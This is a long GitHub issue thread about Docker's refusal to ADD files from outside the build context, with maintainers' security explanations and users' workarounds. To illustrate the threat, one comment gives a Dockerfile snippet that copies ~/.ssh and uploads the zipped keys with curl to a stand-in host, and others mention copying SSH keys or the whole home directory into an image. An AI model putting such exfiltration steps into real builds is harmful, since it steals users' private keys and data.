moby: Add with relative path to parent directory fails with "Forbidden path"

If you have an add line in the Dockerfile which points to another directory, the build of the image fails with the message “Forbidden path”.

Example:

FROM tatsuru/debian
ADD ../relative-add/some-file /tmp/some-file

Gives:

$ ../bundles/0.6.6-dev/binary/docker-0.6.6-dev build .
Uploading context 20480 bytes
Step 1 : FROM tatsuru/debian
 ---> 25368de90486
Step 2 : ADD ../relative-add/some-file /tmp/some-file
Error build: Forbidden path: /tmp/relative-add/some-file

I would expect the file to be written to /tmp/some-file, not /tmp/relative-add/some-file.

About this issue

  • State: closed
  • Created 11 years ago
  • Reactions: 40
  • Comments: 167 (18 by maintainers)

Most upvoted comments

@wwoods - even if the client were to parse the Dockerfile and work out what files to send and which to discard, we still can’t afford to bust out of the current directory and let your builder access your client’s entire file system.

There are other solutions to your scenario that don’t increase our insecurity footprint.

either way, restricting the Dockerfile to the current context is not going to change, so I’m going to close this.

I find this behavior fairly frustrating, especially for “meta” Dockerfiles. E.g. I have a /dev folder I do most of my work in, and a /dev/environments git repo which has e.g. /dev/environments/main/Dockerfile. It’s very annoying that this Dockerfile isn’t allowed to:

ADD ../../otherProject /root/project

To add /dev/otherProject as /root/project. Using an absolute path breaks sharing this Dockerfile with other developers.

How is it insecure to allow the builder to access files readable to the user? Why are you superseding linux file security? Please realize that this greatly limits the use cases of Docker and makes it much less enjoyable to add to existing workflows.

-1 to nannies that want to shorten my rope because I might hang myself with it

Sorry to hijack, but this seems completely broken to me. I’ve got a grand total of about 2 hours of Docker experience, so this is more likely a problem with my understanding than with docker.

I’m going to be creating approximately 10 images from our source tree. But to be able to use the ADD command, I would have to put the Dockerfile in the root of the tree, so only 1 image could be built. Not to mention the fact that this would result in a context of close to 100 megabytes.

I could do an ADD with URLs, but this would make it much more difficult for devs to create images for testing purposes.

Another option would be to add source to the image via volumes instead of adding it, but this really seems contrary to the spirit of Docker.

It seems to me that one partial, easy solution would be to modify the build command so that the context and the Dockerfile could be specified separately.

This behaviour is very bizarre and I really don’t think it’s up to users of Docker to care about why it’s implemented the way it’s implemented. What matters is that it’s highly unintuitive and makes working with Docker in an existing project difficult. Why do I need to re-structure my project to get Docker to copy some files over? Seriously.

Here is an example of my project.

docker/
├── docker-compose.yml
├── login-queue
│   ├── Dockerfile
server/
├── login-queue
│   ├── pom.xml
├── login-queue-dependency
│   ├── pom.xml
├── pom.xml
├── 500MB folder

My first attempt was doing relative ADDs in the docker/server/Dockerfile, i.e.:

ADD ../../server/login-queue /opt/login-queue
ADD ../../server/login-queue-dependency /opt/login-queue-dependency

To my surprise, this did not work. You can’t add files outside of the folder you run docker build from. I looked for some alternatives, found the -f option, and tried:

cd server && docker build -t arianitu/server -f docker/login-queue/Dockerfile .

This does not work either because the Dockerfile has to actually be inside the context.

`unable to prepare context: The Dockerfile (docker/login-queue/Dockerfile) must be within the build context (.)`

Okay, so I have the option to move all the Dockerfiles into the server/ folder.

Here’s the issue now: my image requires both login-queue and login-queue-dependency. If I place the Dockerfile in server/login-queue, it cannot access ../login-queue-dependency, so I have to move server/login-queue-dependency into server/login-queue, or make a Dockerfile in the root of server/. If I place the Dockerfile in the root of server/, I have to send the 500MB folder to the build agent.

Jesus, I want to selectively pick some folders to copy to the image (without having to send more than I actually need to send, like the entire server/ directory.) Something seems broken here.

That seems pretty flawed, in that it greatly restricts the viable scope of Dockerfiles. Specifically, it disallows Dockerfiles layered on top of existing code configurations, forcing users to structure their code around the Dockerfile rather than the other way around. I understand the reasoning behind allowing the daemon to be on a remote server, but it seems like it would greatly improve Docker’s flexibility to parse the Dockerfile and upload only specified sections. This would enable relative paths and reduce bandwidth in general, while making usage more intuitive (the current behavior is not very intuitive, particularly when playing on a dev box).

@wwoods I set up a GitHub repository with code and a Dockerfile in it, you clone it to ~/code/gh-repos/, cd to ~/foobarbaz and run docker build -t foobarbaz .. Let’s say I’m a bad guy and I add something like this to the Dockerfile: ADD .. /foo. The image will now contain your entire home directory and anything you might have there. Let’s say the resulting image also ends up on the Internet on some registry. Everyone who has the image also has your data - browser history & cookies, private documents, passwords, public and private SSH keys, some internal company data and some personal data.

We’re not going to allow Docker ADD to bust out of its context via .. or anything like it.

This is a major pain in the ass for us and apparently a lot of people. In our case we are now having to create a separate repo and script around this because Docker won’t copy files from a repo of shared code that is symlinked in. I have to agree that Docker should not be worrying about the security aspect. It should trust devs to know what they’re doing. There are a million ways to shoot oneself in the foot in development if you don’t, but at least we have the option to do it.

And for the record, copying shared common code into a build is not insecure or shooting oneself in the foot. It should be possible.

This is so stupid. I need to add specific resources from a few folders, like my built application and my front-end resources. Unfortunately docker won’t allow you to do ADD ../, and it strangely includes random files I don’t specify with ADD when I do it from the parent folder. Why does it do this?

Why do the best practices state that the Dockerfile be in its own empty directory, and then disable relative pathing? That makes no sense.

first up, when I want to build several images from common code, I create a common image that brings the code into that image, and then build FROM that. more significantly, I prefer to build from a version controlled source - ie docker build -t stuff http://my.git.org/repo - otherwise I’m building from some random place with random files.

fundamentally, no, when I put on my black-hat, I don’t just give you a Dockerfile, I tell you what command to run.

let me re-iterate. there are other ways to solve your issues, and making docker less secure is not the best one.

Well, I have a workaround, even if I am not sure it will solve all use cases. If you have a tree like this:

A
│   README.md 
└───B
│   │   myJson.json
│
└───C
    │   Dockerfile

And you need to access myJson.json from the dockerfile, just write the dockerfile as if you were in A:

FROM my_image
ADD ./B/myJson.json .

And then launch docker specifying the path to the Dockerfile:

docker build -f ./C/Dockerfile .

That way, it works for me.

Moreover if you use docker compose, you can also do (assuming your docker-compose.yml is in A):

version: '3'
services:
  my_service:
    build:
      context: ./
      dockerfile: ./C/Dockerfile

Just stumbled upon this bug and I am dumbfounded how such a limitation still exists in 2017.

@Vanuan please consider that the GitHub issue tracker is not a general support / discussion forum, but for tracking bugs and feature requests.

Your question is better asked on

  • forums.docker.com
  • the #docker IRC channel on freenode
  • StackOverflow

Please consider using one of the above

The build actually happens in /tmp/docker-12345, so a relative path like ../relative-add/some-file is relative to /tmp/docker-12345. It would thus search for /tmp/relative-add/some-file, which is also shown in the error message. It is not allowed to include files from outside the build directory, so this results in the “Forbidden path” message.

It was not clear to me that the directory is moved to another directory in /tmp before the build, or that the paths are resolved after moving the directory. It would be great if this could be fixed, or if the error message could be clearer. For example: “relative paths outside the sandbox are not currently supported” when supplying a relative path, or “The file %s is outside the sandbox in %s and cannot be added” instead of “Forbidden path”.

This is extremely unfortunate. At this point, it’s physically impossible for me to add any new ideas, since all of them have already been brought up. But for some reason, the Docker people seem to keep complaining about security aspects.

This makes less than zero sense: just add an --enable-unsafe-parent-directory-includes flag, which is disabled by default. Boom: everyone is happy. Can we stop pretending that security is a concern here?

If the attack vector is that an attacker somehow convinced me to run docker build --enable-unsafe-parent-directory-includes on their Dockerfile, then I think I’m stupid enough that they also could have convinced me to run rm -rf ~.

Would it be possible to add an option flag that would allow users to manually add specific directories to expand the context?

Even after all these years, this silly restriction hasn’t been fixed? I swear Docker is growing less appealing by the hour.

Sad.

To be honest this is quite an annoying “feature”. Our workaround was with scripting, copying the necessary files before running docker build then removing them.

It would be much easier if you could reference parent folders.
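
For illustration, a minimal sketch of that kind of wrapper script, assuming the shared code lives in a sibling directory (all paths and image names here are illustrative, not taken from the comment above):

#!/bin/sh
# Copy the shared files into the build context, build, then clean up again.
set -e
cp -r ../shared-lib ./shared-lib      # bring the outside files into the context
docker build -t myorg/myservice .     # the Dockerfile can now COPY shared-lib /opt/shared-lib
rm -rf ./shared-lib                   # remove the temporary copy afterwards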

Put it in the root and use the .dockerignore file


@festus1973 read https://github.com/docker/docker/issues/2745#issuecomment-35335357 on the “why”. Keep in mind that docker build runs on the daemon, which could be on a remote server. The daemon gets passed the “context”, which is an archive (.tar) of the files to use for building, so it simply does not have access to anything outside that, because it’s not in the archive. In addition, a Dockerfile having full access to your client machine is a major security concern (as has been mentioned in this thread).

Allowing “random” files from the client that triggers the build to be sent to the daemon (for building) requires a complete rewrite of the way the builder works. Alternative approaches (such as an rsync-like approach, where the daemon requests files from the client when needed) are being looked into, but do require a lot of engineering, design, and security audits.

Meanwhile, alternative approaches (admittedly, less convenient) are mentioned in this discussion https://github.com/docker/docker/issues/2745#issuecomment-253230025

@thaJeztah Thanks for being patient to such ignorant comments and keep up the good work!

@Vanuan: I’m new to Docker and am totally unfamiliar with Linux commands (I’m on Windows) but if I understand you correctly, it looks like you’re presenting a scenario wherein a dockerfile instructs the docker build engine to (1) copy a file or path containing private keys (or some other sensitive info) to a newly built docker container image and then (2) FTP the contents to a malevolent third party.

But how would I get that infected dockerfile into my build environment in the first place? Is the hacker going to email it to me? Let’s say he does. Even if he did AND I were stupid enough to accept a file from a random party AND I decided I wanted to execute the contents of said random file, how would I do so? It’s not like I can trigger a build simply by clicking on a dockerfile. It’s nothing but a text file. A text file is far safer than a .js, .exe, or countless other filetypes that DO have default file handlers when clicked. No, I’d have to intentionally accept the file, not look at its contents, copy it to a dev environment, and manually run a build on it. That’s rather contrived, no?

Seems to me you’d have to have sufficient permissions on the machine(s) housing the dockerfile and source-files in question, as well as the machine running the build. But if you have those permissions already (the ability to read the /.ssh folder, execute the build, etc.) then there are far more effective vectors of attack than attempting to sneak in a bad dockerfile.

I just don’t see how this can be spun as a security issue. There may be other valid technical reasons for this ‘context’ design decision, but I’m just not buying the security angle.

As for whether or not I run untrusted code in a VM… Sure, if it’s a throw-away VM not connected to the rest of my network. Otherwise, I use sensible security practices (e.g. not accepting dockerfiles from unknown parties and then attempting to feed them into a critical build process) and I rely on the OS file system security to do its job.

I successfully worked around this issue using volumes. Example directory structure:

web/
- Dockerfile -> `ADD . /usr/src/app/`
- (code)

webstatic/
- Dockerfile -> `ADD . /usr/src/app/subdir`
- (code)

compose file excerpt:

web:
  build: ./web/

webstatic:
  build: ./webstatic/
  volumes_from:
    - web

Then in the webstatic code I can access the code from the web container. No need for ADD ../web/ .. in webstatic.

+1. There is no reason not to make this possible.

@Vanuan You’re the one working countless hours on open source projects for zero pay and you’re calling me ignorant? Really? But yeah, definitely, keep up the “good work.” Great business model by the way. Please do keep cranking out that code for us, mate! I’m sure you’ll be able to trade in those upvotes you’ve earned for cash one day, or perhaps a figurine of your favorite sci-fi character.

@thaJeztah Thanks for the useful reply. All I can say in response is to point out the same things that other people in this thread and other forums have already noted:

  • A docker file can’t have “full access” to anything. It’s just a text file.

  • Most people are running this thing as admin on their own machine. They don’t expect to get an ‘access denied’ error when trying to access their own files.

  • Your description of docker’s design was helpful. That said, even if your docker build engine were running on a different machine, wouldn’t that untrusted machine still be subject to the permissions of the builder’s local file system? In other words, if a malicious user operating on the machine where the docker builder service is being run tried to surreptitiously insert an ADD/COPY instruction targeting \mylocalMachine\windows\system32\someprivateThing.dat, the attempt would fail on its own due to a permissions denial when trying to execute the ADD/COPY, amiright?

  • Someone pointed to a link in the documentation about this whole “context” concept. It was informative. Most new users aren’t going to find that, though. They’re going to get an “access denied” message when referencing file(s) and folder(s) on their own machine that they know for a fact exist – and by the nature of the error message will just assume the product is fundamentally broken. If there were at least a helpful error message, perhaps mentioning a keyword like ‘context’ or better yet, one quick sentence about the unusual folder structuring requirements, it would make a world of difference. Then the user could step back and make a rational decision on whether or not he wants to (a) totally rework the natural existing folder structure he has in place in order to make it Docker-centric instead of workflow-centric, or (b) write a program to copy his source files into a standalone Docker-centric folder structure, or (c) move on.

Again, nothing new here. Just recapping what other new users like me have already pointed out. The only surprise from my standpoint is that this has been a confusing stumbling block for new users since 2013 and no action (not even an enhanced error message) has been taken to mitigate.

How about my suggestion of adding an option to the build command so that the root directory can be specified as a command line option? That won’t break any security, and should cover every use case discussed here.

Opened https://github.com/moby/moby/issues/37129 with a proposal for multiple build-contexts

The daemon still needs to have all files sent. Some options that have been discussed;

  • Allow specifying a --ignore-file so that multiple Dockerfiles can use the same build-context, but different paths can be ignored for each Dockerfile (https://github.com/moby/moby/issues/12886)
  • The reverse: allow specifying multiple build-contexts to be sent, e.g.
docker build \
  --context lib1:/path/to/library-1 \
  --context lib2:/path/to/library-2 \
  --context api1:/path/to/api1 \
  .

Inside the Dockerfile, those paths could be accessible through (e.g.) COPY --from context:lib1

Just came up against this problem. Would like a config option to get around this.

@mauricemeyer @kitsuneninetails @ReinsBrain As has already been mentioned numerous times, it’s not purely a security issue. Docker has a client-server architecture. The Docker builder is currently implemented on the server side. So if you want to use files outside the build context you’d have to copy those files to the docker server.

One thing docker newbies don’t realize is that you can keep the Dockerfile separate from the build context. I.e. if you have root/proj1/build/Dockerfile, root/proj2/build/Dockerfile, root/common/somecommonfile you can still set the build context to root. But the next thing you’ll complain about is that the build would take prohibitively long, as you now have to copy the whole root directory to the machine where the docker server resides.
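
For example, with that layout the builds might be invoked roughly like this from root (a sketch; the image names are illustrative):

# context is the repository root, so both Dockerfiles can COPY common/somecommonfile
docker build -f proj1/build/Dockerfile -t proj1 .
docker build -f proj2/build/Dockerfile -t proj2 .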

Basically docker is either avoiding work on something people really need and have to build hacky workarounds for, or they think linux file system security isn’t good enough.

That would work fine; I’ll just point out the security implications are the same. From my perspective that’s fine though, in that the context change is very transparent on the command line.

As for why they’re the same, you have:

docker build -f Dockerfile ..

Equivalent to the aforementioned

docker build -c .. .

I do like the Dockerfile / context specification split in #2112 better though. Good luck with that 😃 Hopefully it gets merged in.

You can use multi-stage builds;

Create a Docker image for your packages (or build several of such images)

Dockerfile.packages:

FROM scratch
COPY instrumentation.jar /

Build it;

docker build -t my-packages:v1.0.1 -f Dockerfile.packages .

Now, every image that needs these packages can include them as a build-stage. This gives the advantage over a “base image” that you can “mix and match” what you need;

FROM my-packages:v1.0.1 AS packages

FROM nginx:alpine
COPY --from=packages /instrumentation.jar /some/path/instrumentation.jar

Another image that also wants this package, but uses a different base-image;

FROM my-packages:v1.0.1 AS packages

FROM mysql
COPY --from=packages /instrumentation.jar /some/path/instrumentation.jar

Or several of your “package” images

FROM my-packages:v1.0.1 AS packages
FROM my-other-packages:v3.2.1 AS other-packages

FROM my-base-image
COPY --from=packages /instrumentation.jar /some/path/instrumentation.jar
COPY --from=other-packages /foobar-baz.tgz /some/other-path/foobar-baz.tgz

Me too, man. I eventually gave up on Docker. I’m not claiming that others haven’t found viable uses for it. In fact, I know they have and I wish them the best. But from my perspective, everything I try to do with Docker dead-ends in some obscure bug or limitation. Even with seemingly simple tasks, Docker seems to fight me every step of the way. Some of the problems have solutions but they’re undocumented and require a fair amount of hacking and trial-and-error to resolve, particularly if one is using Windows Server instead of Linux. I searched around and saw a lot of users, particularly Windows users, giving up in frustration so decided to follow their lead. Perhaps it’ll be a more polished, viable solution for me a few years down the road but it’s just not there yet.

another work-around: forget docker and go higher up the chain using LXD to host your own complete images

You can’t get around this with symbolic links, either, unfortunately.

-1 Reduces Docker security? What security? It’s about portability.

@graup so now you have two containers that have to run on the same host. Docker volumes and volume management is one of its weakest points.

Please read back https://github.com/docker/docker/issues/2745#issuecomment-278505867 (and https://github.com/docker/docker/issues/2745#issuecomment-35335357). There is no “permission” check here. A Dockerfile cannot refer to files outside the passed build-context because those files are not there.

Thanks, I’m switching to using Docker in swarm mode, and organizing the code is an important part. I thought changing the dockerfile context to a parent directory was not possible; it turns out that it is. This is what I ended up doing:

Regarding file organization:

/app - project’s root directory

  • setup - docker related files, build tools, shellScripts, & tests
  • source - raw project code (server & client sides)
  • distribution - production ready code

Regarding “Forbidden path” error:

Running docker-compose up from the project root folder, like so: docker-compose -f ./setup/<docker-compose>.yml up. Inside the docker-compose file:

...
    build:
      # Setting context of dockerfile which will be executed.
      context: ../
      dockerfile: ./setup/<dockerfilename>
    # Volume path is relative to docker-compose file, not the dockerfile execution context.
    volumes:
      - ../source/:/app/source/
...

& for running individual dockerfiles:

  • cd to project’s root directory
  • docker build -t <imagename> -f setup/nodejsWeb.dockerfile ./
  • docker run -d <imagename>

This way dockerfile/dockercompose can use parent directory in the process of creating images. This is what makes sense for me.

Not being able to reference the parent folder makes docker more complicated than it should be. Undesirable “feature”. Why take this choice away from the user?

=> Our workaround was with scripting, copying the necessary files before running docker build then removing them.

Thank you for your solution.

So why can’t we do this? A tool should not be enforcing its own ideology onto its users when it’s designed to be as versatile as possible.

This is something that baffles me also. I just ran into this limitation, and I can’t see any reason for it. To say this is a security issue due to malicious people placing bad lines in their Dockerfile and then telling people to clone, build, and publish the image is flimsy reasoning. If I pull a Dockerfile from the Internet (github or whatever) and blindly follow orders without looking at the file to create an image that I subsequently blindly and naively publish to a public repository, I will reap what I deserve. To limit the product for that edge case is specious logic at best.

I am using (and highly recommend if possible) the workaround proposed by @Romathonat which actually works in my case, because I can have central config isolated in its own parent directory, but it’s easy to see how that case might not work for everyone.

But, at the core, it’s frustrating to see so many people speaking out with user experiences just to get shut down without a fair hearing.

(Added: I’ll just leave this here from Moby’s README.md):

Usable security: Moby will provide secure defaults without compromising usability.

So much for running a microservice architecture with multiple repositories and Dockerfiles. 😕 Please reopen.

Edit: As a workaround, I created a parent repository and added my other repos as git submodules. I feel like it’s a hacky solution though.

@Romathonat it doesn’t unfortunately. You could add every directory to the dockerignore and it would be just as big. It unavoidably adds everything in the parent directory. Docker states in its official docs that the Dockerfile should be in its own empty directory, … but then disables relative pathing.

I used a similar approach, writing a PowerShell script to copy all necessary files to a docker-centric folder structure prior to running the build. It’s becoming fairly clear that the whole ‘context’ bit was a fundamental design mistake that’s extremely hard for developers to fix at this stage – and is thus being spun as a “security issue.”

I’m with festus1973 in not getting what attack vector this is supposed to counteract. The fear is of instructions being added to the Dockerfile that expose the user’s files in an image and potentially in a public repository. But if an attacker can insert such commands into my Dockerfile then apparently my machine is already compromised, and my user files can be siphoned off anyway.

But maybe exactly this scenario once played out not through an attack, but through user error and accident? For now, though, the answer seems to be to do surgery on our projects to move exactly the files Docker depends on into a single subdirectory, but no others, a scenario which is likely to lead to people copy-pasting files, moving files out of their natural context, having to pass their entire project directory to the daemon, or other unsavory things like that.

Maybe this would be better as a loud warning with a command-line flag to silence it?

There really should be a command line option to allow this, something like “–allow-relative-imports”. Or even better, have a way to specify additional locations for the build context (not substitutes), e.g.: “–additional-paths=/path/a:/path/b:/path/c”.

As for the relative paths option, there’s no need for it to follow relative paths by default, so there is no security issue unless it is enabled. However, not having it at all is a huge disadvantage that leads to the use of other build tools wrapped around docker build - which isn’t just inconvenient but also totally circumvents this security mechanism, making it useless for these use cases anyway.

+1 for allowing something like ‘COPY ../../src’

I’m sorry, but any environment that pushes developers to use such clumsy project structures will never mature and leave the mickey-mouse stage. This is not how successful products evolve, and no PR hype can save it for long.

Docker team, please propose some viable solution.

+1. This looks like a very basic and useful feature. Sharing code/library between containers is a challenging task, and this limitation makes it worse.

+1 for the allow-parent-folders flag.

Gotcha… still really need some workaround for this issue. Not being able to have a Dockerfile refer to its parents sure limits usage. Even if there’s just a very verbose and scary flag to allow it, not having the option makes Docker useless for certain configurations (again, particularly when you have several images you want to build off of a common set of code). And the upload bandwidth is still a very preventable problem with the current implementation.

@festus1973 I think the threat model here is that you download and run some project with a Dockerfile which will contain this:

ADD ~/.ssh /root/.ssh
RUN sh -c "zip ssh.zip /root/.ssh; curl -T ssh.zip ftp://hacker.me"

Sure, it’s not a threat model for a mass-scale user, but it’s absolutely possible for a more targeted attack. The reason why it has not happened yet is cryptic. Do you always run untrusted code in a virtual machine?

The context for https://github.com/six8/dockerfactory is created by tarring up whatever the user defines.

I think the problem with allowing the Dockerfile to specify arbitrary directories is that someone creating a public Dockerfile could maliciously read things like your SSH keys. Simply add COPY /home/$USER/.ssh .ssh and have the default entrypoint push them somewhere the attacker could retrieve them. So by default, denying anything outside of the Dockerfile directory makes sense from a security perspective.

However, for custom build systems, it makes sense to be able to define arbitrary build contexts. Docker does provide a way via tarring up files and piping them in, but that’s not declarative like a Dockerfile. You end up having to check in build scripts that will handle tarring and then passing to docker. You can’t just simply docker build . anymore. So anything someone comes up with to do this will be non-standard and thus more confusing.

I think you’ll always need something outside of Dockerfile to be able to pass in arbitrary contexts for security sake. But that doesn’t stop docker from creating something like Dockerfactory.yml to be able to do it so it will at least be a standard.

I prefer a declarative approach in a file like Dockerfile and Dockerfactory.yml, but having it built into the docker build command would make it more obvious. Something like:

# --context <host dir>:<container dir>
docker build --context ../../lib-src:/lib-src --context ../src:/src .

--context would mirror --volume and be a concept most people using Docker are familiar with.

A malicious person could still tell you to do docker build --context $HOME:/home . and steal your files. However, you’d have to manually run this command; it wouldn’t happen automatically just because you check out a Dockerfile and run it blindly.

I use tar to work around this.

Say I have directories:

a/Dockerfile
a/libA
b/libB
c/libC

and I am in directory a working on my project, you can do tar cf - . -C ../b libB -C ../c libC | docker build - and you will get a build context which has (at top level) Dockerfile libA libB libC. (-C just changes directory while constructing the tarball)

I was wondering about adding similar syntax to docker build so you can do the same thing: construct the context from a disjoint set of files. This does not have any of the issues that symlink following has from the security point of view, and is relatively simple to implement; I just haven’t decided on a clear syntax yet, or whether it needs other features.

Note that for complex builds, using tar | docker build - is very flexible, as you can carefully construct build contexts rather than using .dockerignore and it is fast.

@integrii Read the recommended option above: do not use a Dockerfile for development. Use a go base image + docker-compose + mounted folders.
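
A minimal sketch of that suggestion (the image, paths, and command are illustrative assumptions, not from the comment):

# docker-compose.yml for development: no image build at all, just a stock Go image
version: '2'
services:
  app:
    image: golang:1.9
    working_dir: /go/src/myorg/app
    volumes:
      # mount the source tree instead of copying it into an image
      - .:/go/src/myorg/app
    command: go run main.go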

I’ll be the thousandth person to mention that this is an issue, but here’s my situation.

I’m working in a haskell codebase that defines a dependency file (stack.yaml) at the root of the project. We have subprojects that are only tangentially related, but everything is built using the global stack.yaml at the project root. I need it in order to build a subproject, but we should have dockerfiles per subproject, not for the whole megarepo.

.
├── stack.yaml
├── project-a
│   ├── Dockerfile
│   └── (etc)
└── project-b
    ├── Dockerfile
    └── (etc)

Builds should be local to project-a, for example, but I need the stack.yaml from the parent directory in order to build. This is a huge problem and I, like many others, think there should be a configuration variable or docker flag that allows users work around this issue.

Apparently, quite a few people seem to think that using tar solves this problem. Good luck trying to use the tar approach with 30 different docker containers, when each needs its own hand-picked context. Especially if they are rebuilt regularly. You will end up using some sort of build script or ugly workaround. And that’s the entire point of this discussion. It should not be necessary to do what we are doing, when the problem could be treated at its source.

IMO if Docker is not willing to work with parent directory files for some sort of security reasons, it should work with symlinks in the current directory to parent directory files

e.g.

bar/
   actual-file.sh
foo/
   baz/          << current working directory has symlink to a parent directory
      symlink-to-actual-file
      Dockerfile

right now Docker is calling lstat on a symlink that exists, and it’s giving me this error:

lstat symlink-to-actual-file: no such file or directory

if the symlinks are there, permissions should be fine

To wrap this up: There are several options.

  1. Use .gitignore with negative pattern (or ADD?)
*
!directory-i-want-to-add
!another-directory-i-want-to-add

Plus use docker command specifying dockerfiles and context:

docker build -t my/debug-image -f docker-debug .
docker build -t my/serve-image -f docker-serve .
docker build -t my/build-image -f docker-build .
docker build -t my/test-image -f docker-test .

You could also use different gitignore files.

  2. Mount volumes
Skip sending a context at all, just mount volumes during run time (using -v host-dir:/docker-dir).

So you’d have to:

docker build -t my/build-image -f docker-build . # build `build` image (devtools like gulp, grunt, bundle, npm, etc)
docker run -v output:/output my/build-image build-command # copies files to output dir
docker build -t my/serve-image -f docker-serve . # build production from output dir
docker run my/serve-image # production-like serving from included or mounted dir
docker build -t my/serve-image -f docker-debug . # build debug from output dir
docker run my/serve-image # debug-like serving (uses build-image with some watch magic)

Is that something that people usually do? What are devs’ best practices? I’m sorry, I’m quite new with docker. Quite verbose commands there. Does it mean docker isn’t suitable for development?

Another note - the only possible workaround I’ve found is to symlink the Dockerfile to the root /dev folder. This results in a very long and resource intensive “Uploading context” stage, which appears to (quite needlessly) copy all of the project directories to a temporary location. If the point of containers is isolation, and Dockerfiles (rightfully) don’t seem to allow interacting with the build system, why does Docker need to copy all of the files? Why does it copy files that are not referenced in the Dockerfile at all?

It looks like there are some people who want to reference any files from the Dockerfile. But Dockerfile parsing is done on the docker server. So there’s no way it could know which files are referenced.

There are some local image builders, but you have to install them yourself. Plus they’ll probably still need to be run in the VM. And yet, you have to push the images you build to the docker server.

Some people are asking to change the message from “Forbidden path” to something more understandable. Does the message “You can’t reference files outside the build context” make more sense to you?

Your #2 is a non-solution if the Dependency is used by more than one MyOrg project, which, if I understand correctly, is the entire point of @warent’s setup. #3 also breaks once there is more than one top-level project. That really leaves us with just solution #1, which is a lot of hassle for something that should be a non-issue.

Virtually every build system on the planet supports this setup (e.g. CMake’s add_subdirectory actually lets you ascend into the parent directory etc.); Docker is the special needs child here 😃

Wouldn’t it be trivial for Docker to do quick static analysis and detect whether a relative parent directory is being accessed? Then when you try to run or build it, it would abort saying This Dockerfile dangerously accesses parent directories. After making sure you understand the security implications, please run again with the flag --dangerouslyAllowParentDirectories and then add those relative directories to the build context

@Vanuan :

If you allow people to reference any files on your server you’d risk that people would be able to steal private code from each other. How would you solve this?

You run people’s dockers inside their own (isolated) containers.

@kitsuneninetails - you hit the nail on the head. I would like to use docker, but this issue is a show-stopper for me and I suspect many others. I take responsibility for what software I choose to remotely include as part of my own, and I don’t need/want authoritative hobblings of what I can do with software which effectively take away my responsibility with the lame excuse/insult that I (and the larger group of my peers) am irresponsible. I build my own dockers from the ground up anyway, so that “security” issue does not apply in my case. If they want to continue with this foolishness, they do it at their peril, because there are competitors nipping at their heels - I’m just doing my research on https://www.packer.io/intro/why.html - I haven’t yet fully understood if it is the replacement I’m looking for but I suspect it will be the docker killer.

Yes, basically docker build “bundles” the files, and sends them off to the daemon. The Dockerfile is the “script” to apply to those files.

We fully understand that being restricted to having all files in a single location can be limiting; the current “model” makes it very difficult to diverge from that. Things to consider are;

  • an option to provide multiple build contexts (docker build --context-add src=/some/path,target=/path/in/context --context-add src=/some/other/path,target=/some/other/path/in/context -f /path/to/Dockerfile)
  • parsing the Dockerfile client-side, then collect all that’s requested, or use an rsync approach (daemon requesting files from the client). Allowing “arbitrary” paths in the Dockerfile would not work though, because you want the build to be “portable”, “reproducible” (i.e., we don’t want “it works on my machine, because my files happen to be in /home/foo/some/dir”, but it breaks on your machine, because they are located in /home/bar/some-other-dir)

So to keep them reproducible, you’d want to have a “context” in which the files can be found in a fixed location.

There’s a lot of other improvements that can be made to the builder process, and I know there’s people investigating different solutions, creating PoC’s. I’m not up to speed on those designs, so it could be entirely different to my “quick” brain dump above 😄

@myuseringithub Are you new to Docker? Because after using Docker for a year, I figured that the most effective folder structure to use with docker is the following:

/app/Dockerfile
/app/dev/Dockerfile

I.e. you only need 2 dockerfiles:

  • one for production-like environment (including qa, staging, etc), where application is built from sources and included in an image
  • one for development-like environment (including test, ci, etc), where source files are mounted to a running container, and image only contains rarely modified dependencies
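
A rough sketch of what those two Dockerfiles might look like, assuming a Node.js app (the stack, paths and commands are illustrative, not from the comment):

# /app/Dockerfile -- production-like: dependencies plus the built application baked into the image
FROM node:8
WORKDIR /app
COPY package.json ./
RUN npm install --production
COPY . .
CMD ["node", "server.js"]

# /app/dev/Dockerfile -- development-like: only the rarely-changing dependencies;
# the source tree is mounted into the running container (e.g. docker run -v "$PWD":/app ...)
FROM node:8
WORKDIR /app
COPY package.json ./
RUN npm install
CMD ["npm", "run", "dev"]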

+1 for an option that allows turning off the relative pathing restriction.

It’s always a good idea to have “secure” defaults, no need to debate that, but by now it should be apparent that there are a bunch of workflows that get forced into ugly workarounds because of this. That would be completely unnecessary with an option to turn it off (while the default behavior would remain the same).

Some info on my use case. I have a docker/ directory with services subdirectories within. So it’s like project_root/docker/serviceA/Dockerfile, project_root/docker/serviceB/Dockerfile, etc. I have a project_root/docker/docker-compose.yml file that runs installs on all the services. That’s the structure used and it works great, and is limited solely by the “COPY ../src/ /dest/” limitation in a Dockerfile.

I’ve had to write a script to copy each project_root/service/ directory into the directory with the docker/service/Dockerfile and run the build, which runs the Dockerfile with the COPY command (and without the “evil” ../ pathing). To me, this limitation seems just plain erroneous. I think a good fix would be to either allow turning it off through a config variable, or just take out the limitation completely. The point was made above that if this is a security concern, then the user running docker shouldn’t have access to the relative path directory in the first place. I agree with that point. We already have a wheel, so let’s use it and not reinvent it instead.

Seems like a config variable would make everybody happy, something like “allowRelativePathCopies: true”. My vote would be to have it enabled by default, obviously 😄

@graup It is a very nice workaround but it covers a serious design problem. Thanks for sharing this! I can’t believe the docker design forces us to have such workarounds or forcing us a directory structure which is not our choice… This must be fixed.

Thanks for sharing again.

Sometimes you definitely do want to build from a random place with random files - generating a local test image not based off of a commit, for instance. If you have a different testing server or just want to run several different tests at once locally without worrying about database interactions between them, this would be really handy. There’s also the issue where Dockerfiles can only RUN commands they have all information for - if your versioned remote source is password / key protected, this means you’d have to give your Docker image the password / key information anyhow to perform a build strictly with Docker.

There might be ways to solve these issues, but that doesn’t mean they’re pleasant, intuitive, or particularly easy to track down. I don’t think docker would be less secure by allowing a change of context on the command line. I understand the reasons for not transparently stepping outside of the build context. On the other hand, not knowing what you’re running will always be a security risk unless you’re running it in a virtual machine or container anyway. To get around the Dockerfile limitations, packages might have to ship with a Makefile or script that could easily commit the very offenses you’re trying to avoid. I don’t think that the “docker build” command is the right place for the level of security you’re talking about. Making it harder to use / require more external scaffolding makes it more tempting to step outside of Docker for the build process, exacerbating the exact issues you’re worried about.

Which means you now have two repositories: one that contains the build scripts, and another containing the code. Which have to be properly synchronized. You can use git submodules or git subtrees or ad hoc methods, but all of those options have serious drawbacks. There are many reasons, some good, some bad, that corporations tend to have a single repository containing everything. AFAICT, Facebook is one example of a place that only has a single source repository that contains everything.

@wwoods the short answer is that the docker client does not parse the Dockerfile. It tgz’s the context (current dir and all subdirs) up, passes it all to the server, which then uses the Dockerfile in the tgz to do the work.

@vilas27 Yes, this tutorial describes how to set a context directory.

Which implies that the problem here is that docker build --help is not descriptive enough:

docker build --help

